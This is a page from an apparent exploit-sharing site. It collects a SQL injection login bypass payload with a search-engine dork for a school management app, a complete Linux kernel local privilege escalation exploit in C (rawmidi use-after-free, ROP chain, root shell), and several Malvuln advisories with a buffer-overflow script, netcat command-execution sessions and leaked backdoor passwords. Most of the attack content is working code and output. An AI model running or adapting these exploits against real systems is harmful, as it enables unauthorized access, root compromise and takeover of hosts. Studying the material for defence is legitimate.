Latest exploits :: CodePwn

<pre><code>============================================================================================================================================ | # Title : ASIS | Aplikasi Sistem Sekolah using CodeIgniter 3 - SQL Injection Authentication Bypass | | # Author : checkgue | | # Tested on : windows 10 (Home) / Browser : Google Chrome 128.0.6613.114 (Official Build) (64-bit) | | # Vendor : https://www.facebook.com/groups/181558652941070/ | ============================================================================================================================================ poc : [+] Dorking İn Google or Other Search Enggine. "ASIS | Aplikasi Sistem Sekolah" [+] Use payload : user & pass = ' or 0=0 ## [+] Panel : http://localhost/asispanel/ CVE: CVE-2024-45622 References: https://aegislens.com/home/cve-2024-45622/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45622 https://www.cve.org/CVERecord?id=CVE-2024-45622 https://nvd.nist.gov/vuln/detail/CVE-2024-45622 https://github.com/atoz-chevara/cve/blob/main/2024/ASIS_AplikasiSistemSekolah_Using_CodeIgniter3-SQL_Injection_Authentication_Bypass.md https://github.com/advisories/GHSA-8hxv-6g4p-2w59 Greetings to : ===== Meta4sec * Bungker | ==================== </code></pre>

<pre><code>// gcc -o exploit exploit.c -masm=intel -static -s -lpthread #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <stdbool.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/ioctl.h> #include <errno.h> #include <string.h> #include <unistd.h> #include <stdint.h> #include <sound/asound.h> #include <sys/mman.h> #include <sys/syscall.h> #include <linux/userfaultfd.h> #include <sys/timerfd.h> #include <sys/ipc.h> #include <sys/msg.h> #include <pthread.h> #include <poll.h> #define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \ } while (0) #define ADDRESS_PAGE_FAULT1 0x1337000 #define ADDRESS_PAGE_FAULT2 0x3331000 #define ADDRESS_PAGE_FAULT3 0x5551000 #define PAGE_SIZE 0x1000 #define DRIVER_RAWMIDI "/dev/snd/midiC0D0" #define SNDRV_RAWMIDI_STREAM_OUTPUT 0 uint32_t uffd; uint32_t fd1, fd2, fd3; uint64_t next; uint64_t fake_table; pthread_t thread[6]; bool release_page_fault = false; static void *page; unsigned long pivot; unsigned long kernel_base; unsigned long timerfd_tmrproc; unsigned long usr_cs, usr_ss, usr_rflags, usr_sp; struct args_trigger { char *addr; int size; uint32_t fd; }; void hexdump(uint64_t *buf, uint64_t size) { for (int i = 0; i < size / 8; i += 2) { printf("0x%x ", i * 8); printf("%016lx %016lx\n", buf[i], buf[i + 1]); } } static void save_state() { __asm__ __volatile__( "movq %0, cs;" "movq %1, ss;" "pushfq;" "popq %2;" "movq %3, %%rsp\n" : "=r" (usr_cs), "=r" (usr_ss), "=r" (usr_rflags), "=r" (usr_sp) : : "memory" ); } static void getRootShell() { if(getuid()) { printf("[-] Failed to get a root"); exit(0); } printf("[+] uid : %d\n", getuid()); printf("[+] Got root.\n"); execl("/bin/sh", "sh", NULL); } void register_userfaultfd(uint64_t *range) { struct uffdio_api uffdio_api; struct uffdio_register uffdio_register; uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); if (uffd == -1) { perror("[-] userfaultfd"); exit(0); } uffdio_api.api = UFFD_API; uffdio_api.features = 0; if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) { perror("[-] ioctl"); exit(0); } printf("[*] Start monitoring range: %p - %p\n", page, page + PAGE_SIZE); uffdio_register.range.start = (uint64_t) range; uffdio_register.range.len = PAGE_SIZE; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) { perror("[-] ioctl"); exit(0); } puts("[+] Userfaultfd registered"); } void *handler_userfaultfd(void *args) { uint64_t uffd = *(uint64_t *)args; struct uffd_msg msg; struct uffdio_copy uffdio_copy; uint64_t nread; void *page2 = NULL; if ((page2 = mmap((void *)0xdead000, PAGE_SIZE * 5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED) { perror("[-] mmap()"); exit(0); } uint64_t m_ts = 0x000000000000ffff; memcpy(page2, (char *) &m_ts, 8); while (true) { struct pollfd pollfd; int nready; pollfd.fd = uffd; pollfd.events = POLLIN; nready = poll(&pollfd, 1, -1); if (nready == -1) { perror("[-] poll"); exit(0); } nread = read(uffd, &msg, sizeof(msg)); if (nread == 0) { perror("[-] EOF on userfaultfd!\n"); exit(0); } if (nread == -1) { perror("[-] read"); exit(0); } char *page_fault_location = (char *)msg.arg.pagefault.address; if (msg.event != UFFD_EVENT_PAGEFAULT) { perror("[-] Unexpected event on userfaultfd"); exit(0); } if (msg.arg.pagefault.address == (void *)0x1337000 || msg.arg.pagefault.address == (void *)0x3331000 || msg.arg.pagefault.address == (void *)0x5551000) { printf("[+] Page Fault triggered on address 0x%llx\n", msg.arg.pagefault.address); if(msg.arg.pagefault.address == (void *)0x5551000) { memcpy(page2, (char *) &fake_table, 8); } while (release_page_fault == false); uffdio_copy.src = (uint64_t) page2; uffdio_copy.dst = (uint64_t) msg.arg.pagefault.address &~(PAGE_SIZE - 1); uffdio_copy.len = PAGE_SIZE; uffdio_copy.mode = 0; uffdio_copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) { perror("[-] ioctl"); exit(0); } release_page_fault = false; } } close(uffd); puts("[+] Page fault thread finished"); } void *trigger_userfaultfd(struct args_trigger *args) { char *addr = (char *) args->addr; int size = args->size; uint32_t fd = (uint64_t) args->fd; write(fd, addr, size); } void send_msg(int qid, const void *msg_buf, size_t size, long mtype) { struct msgbuf { long mtype; char mtext[size - 0x30]; } msg; msg.mtype = mtype; memcpy(msg.mtext, msg_buf, sizeof(msg.mtext)); if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1) { perror("msgsnd"); exit(1); } } void *recv_msg(int qid, size_t size) { void *memdump = malloc(size); if (msgrcv(qid, memdump, size, 0, IPC_NOWAIT | MSG_NOERROR) == -1) { perror("msgrcv"); return NULL; } return memdump; } void build_rop(char *buf) { uint64_t *rop = (uint64_t *)&buf[0x0]; int k = 0; /* commit_creds(prepare_kernel_cred(0)) */ rop[k++] = kernel_base + 0x15e8; // pop rdi ; ret rop[k++] = 0x0; rop[k++] = kernel_base + 0x8a800; // prepare_kernel_cred rop[k++] = kernel_base + 0x49fb8; // pop rdx ; ret rop[k++] = 0x8; rop[k++] = kernel_base + 0xa6b081; // cmp rdx, 8 ; jne 0xffffffff81a6b05e ; ret rop[k++] = kernel_base + 0x3dfdb4; // mov rdi, rax ; jne 0xffffffff813dfda1 ; xor eax, eax ; ret rop[k++] = kernel_base + 0x8a3c0; // commit_creds /* kpti trampoline */ rop[k++] = kernel_base + 0xc00a45; // swapgs_restore_regs_and_return_to_usermode + 22 rop[k++] = 0x0; // rax rop[k++] = 0x0; // rdi rop[k++] = (unsigned long)&getRootShell; rop[k++] = (unsigned long)usr_cs; rop[k++] = (unsigned long)usr_rflags; rop[k++] = (unsigned long)usr_sp; rop[k++] = (unsigned long)usr_ss; uint64_t *func_table = (uint64_t *)&buf[0x100]; for (size_t i = 0; i < 12; i++) { if (i == 4) { *func_table++ = kernel_base + 0x1e; // ret; continue; } if (i == 5) { *func_table++ = kernel_base + 0x1e; // ret continue; } if (i == 6) { *func_table++ = kernel_base + 0x1e; // ret continue; } *func_table++ = 0xdeadbeefdeadbe00 + i; } *func_table = pivot; } void pin_cpu(long cpu_id) { cpu_set_t mask; CPU_ZERO(&mask); CPU_SET(cpu_id, &mask); if (sched_setaffinity(0, sizeof(mask), &mask) == -1) { err("`sched_setaffinity()` failed: %s", strerror(errno)); } return; } void main(void) { pin_cpu(0); struct snd_rawmidi_params srp; save_state(); /* ===================== [ SETP 1 - KASLR Leak ] ===================== */ puts("[+] STEP 1 : KASLR leak"); fd1 = open(DRIVER_RAWMIDI, O_RDWR); if (fd1 < 0) { perror("[-] open"); exit(0); } puts("[+] Opening rawmidi"); int qid[2]; if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1) { perror("msgget"); exit(1); } struct itimerspec its; its.it_interval.tv_sec = 0; its.it_interval.tv_nsec = 0; its.it_value.tv_sec = 9999; its.it_value.tv_nsec = 0; int tfd[256]; for(int i = 0; i < 256 / 2; i++) { tfd[i] = timerfd_create(CLOCK_REALTIME, 0); timerfd_settime(tfd[i], 0, &its, 0); } if ((page = mmap((void *)0x1336000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED) { perror("[-] mmap()"); exit(0); } puts("[+] Mapping two pages"); char *addr = page; memset(addr, 'A', PAGE_SIZE); puts("[+] Registering one page userfaultfd"); /* Registering mapped area */ register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT1); puts("[+] Raising up the handler for userfaultfd"); /* Handler for userfault */ pthread_create(&thread[0], NULL, handler_userfaultfd, (void *) &uffd); /* Create one object by size 256 */ srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT; srp.buffer_size = 240; srp.avail_min = 1; uint64_t err = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp); puts("[+] Created one object by size 256"); if (err < 0) { perror("[-] ioctl"); exit(0); } struct args_trigger args; args.addr = addr + PAGE_SIZE - 0x18; args.size = 0x18 + 0x8; args.fd= fd1; /* Blocking before object created by size 256 in userfault */ pthread_create(&thread[1], NULL, (void *) trigger_userfaultfd, &args); puts("[+] Triggering userfaultfd"); /* Deleting before object created by size 256 generating an UAF */ srp.buffer_size = 250; err = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp); puts("[+] Deleting before object created by size 256 generating UAF"); if (err < 0) { perror("[-] ioctl"); exit(0); } /* send_msg 'A' */ char buf[0xf8 - 0x30]; memset(buf, 0x41, sizeof(buf)); send_msg(qid[0], buf, 0xf8, 1); puts("[+] Allocate msg_msg in kmalloc-256"); printf("[*] Waiting for userfaultd to finish ..\n"); release_page_fault = true; /* spray timerfd_ctx in kmalloc-256 */ for(int i = 256 / 2; i < 256; i++) { tfd[i] = timerfd_create(CLOCK_REALTIME, 0); timerfd_settime(tfd[i], 0, &its, 0); } puts("[+] Allocate timerfd_ctx in kmalloc-256"); while(release_page_fault == true); printf("[+] Page fault lock released\n"); uint64_t *leak = recv_msg(qid[0], 0x2000); // hexdump(leak, 0x2000); timerfd_tmrproc = *(leak + (0x200 / sizeof(uint64_t))); kernel_base = timerfd_tmrproc - 0x2201f0; pivot = kernel_base + 0x8fc625; // push r8 ; add byte ptr [rbp + 0x41], bl ; pop rsp ; pop r13 ; ret printf("[+] timerfd_tmrproc addr : 0x%lx\n", timerfd_tmrproc); printf("[+] kernel_base addr : 0x%lx\n", kernel_base); printf("[+] pivot addr : 0x%lx\n", pivot); for(int i = 0; i < 256; i++) { close(tfd[i]); } close(fd1); puts("[+] Close rawmidi"); /* ===================== [ SETP 2 - SMAP Bypass ] ===================== */ puts("\n[+] STEP 2 : SMAP bypass"); release_page_fault = false; fd2 = open(DRIVER_RAWMIDI, O_RDWR); if (fd2 < 0) { perror("[-] open"); exit(0); } puts("[+] Opening rawmidi"); if ((qid[1] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1) { perror("msgget"); exit(1); } if ((page = mmap((void *)0x3330000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED) { perror("[-] mmap()"); exit(0); } puts("[+] Mapping two pages"); addr = page; memset(addr, 'B', PAGE_SIZE); puts("[+] Registering one page userfaultfd"); /* Registering mapped area */ register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT2); puts("[+] Raising up the handler for userfaultfd"); /* Handler for userfault */ pthread_create(&thread[2], NULL, handler_userfaultfd, (void *) &uffd); /* Create one object by size 512 */ srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT; srp.buffer_size = 500; srp.avail_min = 1; err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp); puts("[+] Created one object by size 512"); if (err < 0) { perror("[-] ioctl"); exit(0); } args.addr = addr + PAGE_SIZE - 0x18; args.size = 0x18 + 0x8; args.fd= fd2; /* Blocking before object created by size 512 in userfault */ pthread_create(&thread[3], NULL, (void *) trigger_userfaultfd, &args); puts("[+] Triggering userfaultfd"); /* Deleting before object created by size 512 generating an UAF */ srp.buffer_size = 90; err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp); puts("[+] Deleting before object created by size 512 generating UAF"); if (err < 0) { perror("[-] ioctl"); exit(0); } /* rop spray in kmalloc-512 */ char secondary_buf[0x1ea - 0x30]; memset(secondary_buf, 0, sizeof(secondary_buf)); build_rop(secondary_buf); printf("[*] Waiting for userfaultd to finish ..\n"); release_page_fault = true; for(int i = 0; i < 0x20; i++) { send_msg(qid[1], secondary_buf, 0x1ea, 0x1337); } puts("[+] Spray ROP Chain in kmalloc-512"); while(release_page_fault == true); printf("[+] Page fault lock released\n"); uint64_t *leak2 = recv_msg(qid[1], 0x2000); next = *(leak2 + (0x1d8 / sizeof(uint64_t))) + 0x30; fake_table = next + 0x100; printf("[+] msg_msg->m_list.next leak : 0x%lx\n", next - 0x30); printf("[+] Fake tty_struct->ops function table: 0x%lx\n", fake_table); // hexdump(leak2, 0x2000); close(fd2); puts("[+] Close rawmidi"); /* ===================== [ SETP 3 - tty_struct->ops overwrite ] ===================== */ puts("\n[+] STEP 3 : Fake tty_struct->ops overwrite"); release_page_fault = false; fd3 = open(DRIVER_RAWMIDI, O_RDWR); if (fd3 < 0) { perror("[-] open"); exit(0); } puts("[+] Re-opening rawmidi"); if ((page = mmap((void *)0x5550000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED) { perror("[-] mmap()"); exit(0); } puts("[+] Mapping two pages"); addr = page; memset(addr, 'C', PAGE_SIZE); puts("[+] Registering one page userfaultfd"); /* Registering mapped area */ register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT3); puts("[+] Raising up the handler for userfaultfd"); /* Handler for userfault */ pthread_create(&thread[4], NULL, handler_userfaultfd, (void *) &uffd); /* Create one object by size 800 */ srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT; srp.buffer_size = 800; srp.avail_min = 1; err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp); puts("[+] Created one object by kmalloc-1024"); if (err < 0) { perror("[-] ioctl"); exit(0); } args.addr = addr + PAGE_SIZE - 0x18; args.size = 0x18 + 0x8; args.fd= fd3; /* Blocking before object created by size 1024 in userfault */ pthread_create(&thread[5], NULL, (void *) trigger_userfaultfd, &args); puts("[+] Triggering userfaultfd"); /* Deleting before object created by size 1024 generating an UAF */ srp.buffer_size = 90; err = ioctl(fd3, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp); puts("[+] Deleting before object created by size 1024 generating UAF"); if (err < 0) { perror("[-] ioctl"); exit(0); } int spray[256]; /* tty_struct spray */ for(int i = 0; i < 256; i++) { spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY); if(spray[i] < 0) { printf("[-] Failed open /dev/ptmx\n"); } } puts("[+] Allocate tty_struct in kmalloc-1024"); release_page_fault = true; while(release_page_fault == true); puts("[+] Page fault lock released"); for(int i = 0; i < 256; i++) { ioctl(spray[i], 0, next - 8); } } </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https://malvuln.com/advisory/6e81618678ddfee69342486f6b5ee780.txt Contact: malvuln13@gmail.com Media: x.com/malvuln Threat: Backdoor.Win32.Symmi.qua Vulnerability: Remote Stack Buffer Overflow (SEH) Description: The malware listens on two random high TCP ports, when connecting (ncat) one port will return a single character like "♣" ord(a) "9827" the other ports return no response, target the non responsive port. Third-party adversaries who can detect and reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting the Structured Exception Handler (SEH). Family: Symmi Type: PE32 MD5: 6e81618678ddfee69342486f6b5ee780 SHA256: a073f0bf8599352b57540930c36d655ba9e5a5afeb0c2606b07372e62476d3b3 Vuln ID: MVID-2024-0692 Dropped files: ksomnbi.dll ASLR: False DEP: False CFG: False Safe SEH: False Disclosure: 09/03/2024 Memory Dump: (1834.3f0): Stack buffer overflow - code c0000409 (first/second chance not available) eax=00000000 ebx=00000000 ecx=fffff74a edx=027ff640 esi=00000000 edi=00000002 eip=76fced3c esp=027ff038 ebp=027ff078 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 ntdll!ZwWaitForMultipleObjects+0xc: 76fced3c c21400 ret 14h 0:007> .ecxr eax=027ff741 ebx=02517ff0 ecx=fffff74a edx=027ff640 esi=025188a7 edi=02800000 eip=10001f32 esp=027ff6ec ebp=027ff6fc iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 ksomnbi+0x1f32: 10001f32 aa stos byte ptr es:[edi] es:002b:02800000=00 0:007> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** WARNING: Unable to verify checksum for Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe *** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe FAULTING_IP: ksomnbi+1f32 10001f32 aa stos byte ptr es:[edi] EXCEPTION_RECORD: 027ff23c -- (.exr 0x27ff23c) ExceptionAddress: 10001f32 (ksomnbi+0x00001f32) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000008 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 02800000 Attempt to write to address 02800000 PROCESS_NAME: Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_PARAMETER1: 00000015 MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 CONTEXT: 027ff28c -- (.cxr 0x27ff28c) eax=027ff741 ebx=02517ff0 ecx=fffff74a edx=027ff640 esi=025188a7 edi=02800000 eip=10001f32 esp=027ff6ec ebp=027ff6fc iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 ksomnbi+0x1f32: 10001f32 aa stos byte ptr es:[edi] es:002b:02800000=00 Resetting default scope WRITE_ADDRESS: 02800000 FOLLOWUP_IP: ksomnbi+1f32 10001f32 aa stos byte ptr es:[edi] FAULTING_THREAD: 000003f0 BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE LAST_CONTROL_TRANSFER: from 10002fc3 to 10001f32 STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 027ff6fc 10002fc3 027ff74a 02517ff0 00000001 ksomnbi+0x1f32 027fff80 41414141 41414141 41414141 41414141 ksomnbi+0x2fc3 027fff84 41414141 41414141 41414141 41414141 0x41414141 027fff88 41414141 41414141 41414141 41414141 0x41414141 027fff8c 41414141 41414141 41414141 41414141 0x41414141 027fff90 41414141 41414141 41414141 41414141 0x41414141 027fff94 41414141 41414141 41414141 41414141 0x41414141 027fff98 41414141 41414141 41414141 41414141 0x41414141 027fff9c 41414141 41414141 41414141 41414141 0x41414141 027fffa0 41414141 41414141 41414141 41414141 0x41414141 027fffa4 41414141 41414141 41414141 41414141 0x41414141 027fffa8 41414141 41414141 41414141 41414141 0x41414141 027fffac 41414141 41414141 41414141 41414141 0x41414141 027fffb0 41414141 41414141 41414141 41414141 0x41414141 027fffb4 41414141 41414141 41414141 41414141 0x41414141 027fffb8 41414141 41414141 41414141 41414141 0x41414141 027fffbc 41414141 41414141 41414141 41414141 0x41414141 027fffc0 41414141 41414141 41414141 41414141 0x41414141 027fffc4 41414141 41414141 41414141 41414141 0x41414141 027fffc8 41414141 41414141 41414141 41414141 0x41414141 027fffcc 41414141 41414141 41414141 41414141 0x41414141 027fffd0 41414141 41414141 41414141 41414141 0x41414141 027fffd4 41414141 41414141 41414141 41414141 0x41414141 027fffd8 41414141 41414141 41414141 41414141 0x41414141 027fffdc 41414141 41414141 41414141 41414141 0x41414141 027fffe0 41414141 41414141 41414141 41414141 0x41414141 027fffe4 41414141 41414141 41414141 41414141 0x41414141 027fffe8 41414141 41414141 41414141 41414141 0x41414141 027fffec 41414141 41414141 41414141 41414141 0x41414141 027ffff0 41414141 41414141 41414141 00000000 0x41414141 027ffff4 41414141 41414141 00000000 00000000 0x41414141 027ffff8 41414141 00000000 00000000 00000000 0x41414141 027ffffc 00000000 00000000 00000000 00000000 0x41414141 SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: ksomnbi+1f32 FOLLOWUP_NAME: MachineOwner MODULE_NAME: ksomnbi IMAGE_NAME: ksomnbi.dll DEBUG_FLR_IMAGE_TIMESTAMP: 537a7d0a STACK_COMMAND: .cxr 0x27ff28c ; kb FAILURE_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_ksomnbi.dll!Unknown BUCKET_ID: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_MISSING_GSFRAME_ksomnbi+1f32 Followup: MachineOwner --------- 0:007> !exchain 027ff0f0: ntdll!_except_handler4+0 (76fd6a50) CRT scope 0, func: ntdll!RtlReportExceptionHelper+251 (770157ad) 027ff710: ksomnbi+30df (100030df) 027fffcc: 41414141 Invalid exception stack at 41414141 Exploit/PoC: from socket import * def doit(): MALWARE_HOST="x.x.x.x" PORT=6917 #random port s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) PAYLOAD="CONNECT /"+"A"*2878 + " HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2878\r\nHost: "+MALWARE_HOST s.send(PAYLOAD.encode()) s.close() while 1: doit() time.sleep(0.5) Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https://malvuln.com/advisory/706ddc06ebbdde43e4e97de4d5af3b19.txt Contact: malvuln13@gmail.com Media: x.com/malvuln Threat: Backdoor.Win32.Optix.02.b Vulnerability: Weak Hardcoded Credentials Description: Optix listens on TCP port 5151 and is packed with ASPack (2.11d). Unpacking is trivial set breakpoints on POPAD, RET, run and dump using OllyDumpEx. The unpacked PE file reveals a very weak three character cleartext password "1q1" stored as "svrpwd=1q1" at offset: 0000da4c of the unpacked malware. Commands sent to the backdoor use a semicolon ";" as a marker E.g. password;1q1; Family: Optix Type: PE32 MD5: 706ddc06ebbdde43e4e97de4d5af3b19 SHA256: 2d38b18bdedfa7f27aac3f52a6d717f3cef7cf809e06f4a34ac0a93c90a82b1c Vuln ID: MVID-2024-0690 Disclosure: 09/03/2024 Exploit/PoC: nc64.exe x.x.x.x 5151 password;1q1; password;1;Optix Lite v0.2 Server Ready... ExecFile;"c:\Windows\System32\calc.exe" Response;File Ran Successfully GetPath; TheServerPath;c:\windows\sec32.exe GetSysDir; TheSysDir; ;C:\WINDOWS\system32\ GetWinDir; TheWinDir; ;C:\WINDOWS\ KillProcPls;pestudio.exe; Response;Program killed successfully! KillProcPls;die.exe; Response;Program killed successfully! GetProcsPls; HeresDaProcs;[System Process];System;smss.exe;csrss.exe;wininit.exe;csrss.exe;winlogon.exe;services.exe;lsass.exe;fontdrvhost.exe;fontdrvhost.exe;svchost.exe;svchost.exe;dwm.exe;... Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https://malvuln.com/advisory/4dc39c05bcc93e600dd8de16f2f7c599.txt Contact: malvuln13@gmail.com Media: x.com/malvuln Threat: Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4) Vulnerability: Unauthenticated Remote Command Execution Family: JustJoke Type: PE32 MD5: 4dc39c05bcc93e600dd8de16f2f7c599 SHA256: 55662483e663bde98d729489c6b25986003a40df1e2be376b0c3b20d2d6c7987 Vuln ID: MVID-2024-0689 Dropped files: Scanvegw.exe Disclosure: 09/03/2024 Description: The malware listens on TCP port 28072. Upon execution, throws an error alert dialog with message: "File DATA1.CAB not found!". The backdoor then drops a hidden PE file named "Scanvegw.exe" in SysWoW64 use attrib -s -h. The malware then makes outbound connections to SMTP port 25. Hit enter twice when sending commands use "E" for Execute and "T" for Terminate. Calling programs incorrectly still gives a response of "Executed!" when it actually fails. The malware calls Win32 WinExec API, supply full path to the file. 0046A0CC push eax ; lpCmdLine 0046A0CD call WinExec 0046A0D2 push offset aTmp ; "tmp!?!" 0046A0D7 push [ebp+var_C] 0046A0DA push offset aExecuted ; " Executed!" 0046A0DF lea eax, [ebp+var_168] 0046A0E5 mov edx, 3 0046A0EA call sub_40495C Exploit/PoC: nc64.exe x.x.x.x 28072 E "c:\\Windows\\System32\\calc.exe"; tmp!?!"c:\\Windows\\System32\\calc.exe"; Executed! E GetDir; tmp!?!GetDir; Executed! GetDir;C:\WINDOWS\system32 @AudioToastIcon.png @EnrollmentToastIcon.png @VpnToastIcon.png @WirelessDisplayToast.png aadauthhelper.dll aadtb.dll AboveLockAppHost.dll accessibilitycpl.dll E GetDrive; tmp!?!GetDrive; Executed!GetDrive;c: d: GetFiles; GetSpace; Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https://malvuln.com/advisory/b0748f1c1a17bad44dc9bd750fc97547.txt Contact: malvuln13@gmail.com Media: x.com/malvuln Threat: Backdoor.Win32.PoisonIvy.ymw Vulnerability: Insecure Credential Storage Family: PoisonIvy Type: PE32 MD5: b0748f1c1a17bad44dc9bd750fc97547 SHA256: 060c15f401ce4d38d70e7f60aabe31c81935d2c261e350c0ea34387886d48920 Vuln ID: MVID-2024-0688 Dropped files: PILib.dll, Poison Ivy.ini, .pip Disclosure: 09/03/2024 Description: PoisonIvy listens on TCP port 3460 by default but that can be changed. When generating PoisonIvy PE files, credentials are stored in cleartext if not using the PasswordKey=1 option which gets stored in ".pik" files. The "Ivy.ini" configuration and profile ".pip" files also contain credentials in cleartext. "malvuln.pip" [Advanced] PEbinary=1 PEc=0 PEd=0 PEp=0 PE=1 FileAlign=512 KeyLogger=0 InjectServer=0 Persistence=0 ProcessMutex=)!VoqA.I4 CustomInject=0 CustomInjectProc=msnmsgr.exe [Connection] Group= HijackProxy=0 HijackProxyPersist=0 DNS=192.168.18.125:3460:0, ID=malvuln Password=apparitionsec PasswordKey=0 Proxy=0 ProxyDNS= [Install] Startup=0 StartupHKLM=1 StartupActiveX=0 ActiveXKey= HKLMName= Copy=0 Filename= CopySystem=1 CopyWindows=0 ADS=0 Melt=0 [Build] Icon= bThirdParty=0 ThirdParty=upx.exe "%s" "Poison Ivy.ini" [Disclaimer] Show=1 [Settings] RemoveKeyFile=1 StorePlugins=1 SDrounds=3 HidePW=0 PlaySound=0 SoundPath=%PI%\sound.wav Cache=1 CachePath=%PI%\Users\%USR%\ ImagePath=%PI%\Users\%USR%\Images\ AudioPath=%PI%\Users\%USR%\Audio\ NotesPath=%PI%\Notes\ AutoRefresh=0 WindowColor=1 TimestampColor=1 KeynameColor=1 WindowName=008000 Timestamp=0000FF Keyname=808080 AutoRemove=1 AutoLookUpdates=1 SimTransfers=2 DownloadPath=%PI%\Users\%USR%\Download\ ProfilePath=%PI%\Profiles\ PluginPath=%PI%\Plugins\ 